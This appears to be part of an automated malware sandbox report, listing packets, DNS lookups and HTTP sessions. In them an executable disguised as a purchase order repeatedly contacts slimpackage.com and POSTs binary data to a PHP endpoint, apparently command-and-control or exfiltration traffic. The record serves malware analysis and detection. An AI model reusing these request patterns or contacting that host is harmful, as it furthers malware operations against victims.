                    Jan 14, 2022 07:15:26.114974022 CET4977280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:26.441430092 CET8049772104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.466988087 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.593509912 CET8049773104.223.93.105192.168.2.4
                    Jan 14, 2022 07:15:27.593699932 CET4977380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:15:27.597120047 CET4977380192.168.2.4104.223.93.105

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 07:15:13.903927088 CET5912353192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:13.923434973 CET53591238.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:15.528506994 CET5453153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:15.647453070 CET53545318.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:16.862633944 CET4971453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:16.881752014 CET53497148.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:18.142127991 CET5802853192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:18.261272907 CET53580288.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:19.516477108 CET5309753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:19.535804987 CET53530978.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:21.174777031 CET4925753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:21.194984913 CET53492578.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:24.109755039 CET6238953192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:24.226423979 CET53623898.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:25.640181065 CET4991053192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:25.659820080 CET53499108.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:27.444946051 CET5585453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:27.465480089 CET53558548.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:28.851008892 CET6454953192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:28.868638039 CET53645498.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:30.184693098 CET6315353192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:30.321918011 CET53631538.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:31.672205925 CET5299153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:31.691579103 CET53529918.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:32.955732107 CET5370053192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:32.973172903 CET53537008.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:35.246782064 CET5172653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:35.266144037 CET53517268.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:37.634501934 CET5653453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:37.653927088 CET53565348.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:40.166773081 CET5662753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:40.183775902 CET53566278.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:43.041888952 CET5662153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:43.060411930 CET53566218.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:44.537666082 CET6311653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:44.557122946 CET53631168.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:46.131236076 CET6407853192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:46.151381969 CET53640788.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:48.529268980 CET6480153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:48.548661947 CET53648018.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:51.134810925 CET6172153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:51.152173042 CET53617218.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:52.762025118 CET5125553192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:52.781132936 CET53512558.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:54.234880924 CET6152253192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:54.254149914 CET53615228.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:56.255400896 CET5233753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:56.274619102 CET53523378.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:58.575176954 CET5504653192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:58.596236944 CET53550468.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:01.477211952 CET4961253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:01.496733904 CET53496128.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:03.121555090 CET4928553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:03.140244961 CET53492858.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:04.371279001 CET5060153192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:04.390710115 CET53506018.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:05.685066938 CET6087553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:05.704754114 CET53608758.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:07.156482935 CET5917253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:07.174711943 CET53591728.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:08.679229021 CET4922853192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:08.697597027 CET53492288.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:11.928960085 CET6054253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:11.948059082 CET53605428.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:14.001940966 CET6068953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:14.020950079 CET53606898.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:17.261699915 CET6420653192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:17.279268026 CET53642068.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:20.238981962 CET5090453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:20.259481907 CET53509048.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:24.393260956 CET5381453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:24.411359072 CET53538148.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:28.115921021 CET5341853192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:28.133634090 CET53534188.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:30.577742100 CET6283353192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:30.594938993 CET53628338.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:32.866368055 CET5926053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:32.886065960 CET53592608.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:34.589356899 CET4994453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:34.606406927 CET53499448.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:36.625505924 CET6330053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:36.645319939 CET53633008.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:38.657772064 CET6144953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:38.675271034 CET53614498.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:39.971518993 CET5127553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:39.991748095 CET53512758.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:41.312222004 CET6349253192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:41.331799030 CET53634928.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:43.229424953 CET5894553192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:43.249593019 CET53589458.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:46.364284992 CET6077953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:46.383768082 CET53607798.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:48.917032003 CET6401453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:48.936470032 CET53640148.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:50.913182020 CET5709153192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:50.931972980 CET53570918.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:52.900542974 CET5590453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:52.919825077 CET53559048.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:55.037755013 CET5210953192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:55.058094978 CET53521098.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:56.862276077 CET5445053192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:56.881892920 CET53544508.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:58.180952072 CET4937453192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:58.200124025 CET53493748.8.8.8192.168.2.4
                    Jan 14, 2022 07:16:59.790585995 CET5043653192.168.2.48.8.8.8
                    Jan 14, 2022 07:16:59.809870958 CET53504368.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:01.058151960 CET6260553192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:01.075694084 CET53626058.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:02.385804892 CET5425653192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:02.405262947 CET53542568.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:03.775289059 CET5218953192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:03.794727087 CET53521898.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:05.055073023 CET5613153192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:05.074599981 CET53561318.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:06.411191940 CET6299253192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:06.430692911 CET53629928.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:07.722347021 CET5443253192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:07.742001057 CET53544328.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:09.254395008 CET5722753192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:09.274477959 CET53572278.8.8.8192.168.2.4
                    Jan 14, 2022 07:17:11.775614977 CET5838353192.168.2.48.8.8.8
                    Jan 14, 2022 07:17:11.796473026 CET53583838.8.8.8192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 14, 2022 07:15:13.903927088 CET192.168.2.48.8.8.80x6a62Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:15.528506994 CET192.168.2.48.8.8.80x6b83Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:16.862633944 CET192.168.2.48.8.8.80x621eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:18.142127991 CET192.168.2.48.8.8.80x4eedStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:19.516477108 CET192.168.2.48.8.8.80x7991Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:21.174777031 CET192.168.2.48.8.8.80x947aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:24.109755039 CET192.168.2.48.8.8.80xfde1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:25.640181065 CET192.168.2.48.8.8.80xa848Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:27.444946051 CET192.168.2.48.8.8.80xb509Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:28.851008892 CET192.168.2.48.8.8.80x370bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:30.184693098 CET192.168.2.48.8.8.80x15ffStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:31.672205925 CET192.168.2.48.8.8.80xf55fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:32.955732107 CET192.168.2.48.8.8.80x97c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:35.246782064 CET192.168.2.48.8.8.80xe66Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:37.634501934 CET192.168.2.48.8.8.80xc3e3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:40.166773081 CET192.168.2.48.8.8.80xee78Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:43.041888952 CET192.168.2.48.8.8.80x394eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:44.537666082 CET192.168.2.48.8.8.80x1de5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:46.131236076 CET192.168.2.48.8.8.80xf757Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:48.529268980 CET192.168.2.48.8.8.80x448cStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:51.134810925 CET192.168.2.48.8.8.80x332Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:52.762025118 CET192.168.2.48.8.8.80xb8a0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:54.234880924 CET192.168.2.48.8.8.80xaa34Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:56.255400896 CET192.168.2.48.8.8.80x5472Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:58.575176954 CET192.168.2.48.8.8.80xc43fStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:01.477211952 CET192.168.2.48.8.8.80xeff0Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:03.121555090 CET192.168.2.48.8.8.80xa14aStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:04.371279001 CET192.168.2.48.8.8.80xf5beStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:05.685066938 CET192.168.2.48.8.8.80x2b37Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:07.156482935 CET192.168.2.48.8.8.80x6624Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:08.679229021 CET192.168.2.48.8.8.80xa227Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:11.928960085 CET192.168.2.48.8.8.80x18e5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:14.001940966 CET192.168.2.48.8.8.80x17e7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:17.261699915 CET192.168.2.48.8.8.80xede4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:20.238981962 CET192.168.2.48.8.8.80x7b1bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:24.393260956 CET192.168.2.48.8.8.80x93a3Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:28.115921021 CET192.168.2.48.8.8.80x204eStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:30.577742100 CET192.168.2.48.8.8.80x6cf1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:32.866368055 CET192.168.2.48.8.8.80x2008Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:34.589356899 CET192.168.2.48.8.8.80x29f7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:36.625505924 CET192.168.2.48.8.8.80x50f4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:38.657772064 CET192.168.2.48.8.8.80xb6d1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:39.971518993 CET192.168.2.48.8.8.80x2d24Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:41.312222004 CET192.168.2.48.8.8.80xa7d6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:43.229424953 CET192.168.2.48.8.8.80x36c1Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:46.364284992 CET192.168.2.48.8.8.80x986bStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:48.917032003 CET192.168.2.48.8.8.80x9e13Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:50.913182020 CET192.168.2.48.8.8.80x51d7Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:52.900542974 CET192.168.2.48.8.8.80xad8dStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:55.037755013 CET192.168.2.48.8.8.80x91edStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:56.862276077 CET192.168.2.48.8.8.80x6ebStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:58.180952072 CET192.168.2.48.8.8.80x31c9Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:59.790585995 CET192.168.2.48.8.8.80x80a5Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:01.058151960 CET192.168.2.48.8.8.80x82b6Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:02.385804892 CET192.168.2.48.8.8.80x21b4Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:03.775289059 CET192.168.2.48.8.8.80x6489Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:05.055073023 CET192.168.2.48.8.8.80x6afStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:06.411191940 CET192.168.2.48.8.8.80xfd66Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:07.722347021 CET192.168.2.48.8.8.80x85eeStandard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:09.254395008 CET192.168.2.48.8.8.80x5702Standard query (0)slimpackage.comA (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:11.775614977 CET192.168.2.48.8.8.80x562fStandard query (0)slimpackage.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 14, 2022 07:15:13.923434973 CET8.8.8.8192.168.2.40x6a62No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:15.647453070 CET8.8.8.8192.168.2.40x6b83No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:16.881752014 CET8.8.8.8192.168.2.40x621eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:18.261272907 CET8.8.8.8192.168.2.40x4eedNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:19.535804987 CET8.8.8.8192.168.2.40x7991No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:21.194984913 CET8.8.8.8192.168.2.40x947aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:24.226423979 CET8.8.8.8192.168.2.40xfde1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:25.659820080 CET8.8.8.8192.168.2.40xa848No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:27.465480089 CET8.8.8.8192.168.2.40xb509No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:28.868638039 CET8.8.8.8192.168.2.40x370bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:30.321918011 CET8.8.8.8192.168.2.40x15ffNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:31.691579103 CET8.8.8.8192.168.2.40xf55fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:32.973172903 CET8.8.8.8192.168.2.40x97c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:35.266144037 CET8.8.8.8192.168.2.40xe66No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:37.653927088 CET8.8.8.8192.168.2.40xc3e3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:40.183775902 CET8.8.8.8192.168.2.40xee78No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:43.060411930 CET8.8.8.8192.168.2.40x394eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:44.557122946 CET8.8.8.8192.168.2.40x1de5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:46.151381969 CET8.8.8.8192.168.2.40xf757No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:48.548661947 CET8.8.8.8192.168.2.40x448cNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:51.152173042 CET8.8.8.8192.168.2.40x332No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:52.781132936 CET8.8.8.8192.168.2.40xb8a0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:54.254149914 CET8.8.8.8192.168.2.40xaa34No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:56.274619102 CET8.8.8.8192.168.2.40x5472No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:15:58.596236944 CET8.8.8.8192.168.2.40xc43fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:01.496733904 CET8.8.8.8192.168.2.40xeff0No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:03.140244961 CET8.8.8.8192.168.2.40xa14aNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:04.390710115 CET8.8.8.8192.168.2.40xf5beNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:05.704754114 CET8.8.8.8192.168.2.40x2b37No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:07.174711943 CET8.8.8.8192.168.2.40x6624No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:08.697597027 CET8.8.8.8192.168.2.40xa227No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:11.948059082 CET8.8.8.8192.168.2.40x18e5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:14.020950079 CET8.8.8.8192.168.2.40x17e7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:17.279268026 CET8.8.8.8192.168.2.40xede4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:20.259481907 CET8.8.8.8192.168.2.40x7b1bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:24.411359072 CET8.8.8.8192.168.2.40x93a3No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:28.133634090 CET8.8.8.8192.168.2.40x204eNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:30.594938993 CET8.8.8.8192.168.2.40x6cf1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:32.886065960 CET8.8.8.8192.168.2.40x2008No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:34.606406927 CET8.8.8.8192.168.2.40x29f7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:36.645319939 CET8.8.8.8192.168.2.40x50f4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:38.675271034 CET8.8.8.8192.168.2.40xb6d1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:39.991748095 CET8.8.8.8192.168.2.40x2d24No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:41.331799030 CET8.8.8.8192.168.2.40xa7d6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:43.249593019 CET8.8.8.8192.168.2.40x36c1No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:46.383768082 CET8.8.8.8192.168.2.40x986bNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:48.936470032 CET8.8.8.8192.168.2.40x9e13No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:50.931972980 CET8.8.8.8192.168.2.40x51d7No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:52.919825077 CET8.8.8.8192.168.2.40xad8dNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:55.058094978 CET8.8.8.8192.168.2.40x91edNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:56.881892920 CET8.8.8.8192.168.2.40x6ebNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:58.200124025 CET8.8.8.8192.168.2.40x31c9No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:16:59.809870958 CET8.8.8.8192.168.2.40x80a5No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:01.075694084 CET8.8.8.8192.168.2.40x82b6No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:02.405262947 CET8.8.8.8192.168.2.40x21b4No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:03.794727087 CET8.8.8.8192.168.2.40x6489No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:05.074599981 CET8.8.8.8192.168.2.40x6afNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:06.430692911 CET8.8.8.8192.168.2.40xfd66No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:07.742001057 CET8.8.8.8192.168.2.40x85eeNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:09.274477959 CET8.8.8.8192.168.2.40x5702No error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)
                    Jan 14, 2022 07:17:11.796473026 CET8.8.8.8192.168.2.40x562fNo error (0)slimpackage.com104.223.93.105A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • slimpackage.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.449765104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:14.068203926 CET1148OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
                    Jan 14, 2022 07:15:14.326773882 CET1149INHTTP/1.1 404 Not Found
                    Date: Fri, 14 Jan 2022 06:15:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.449766104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:15.774785995 CET1150OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 190
                    Connection: close
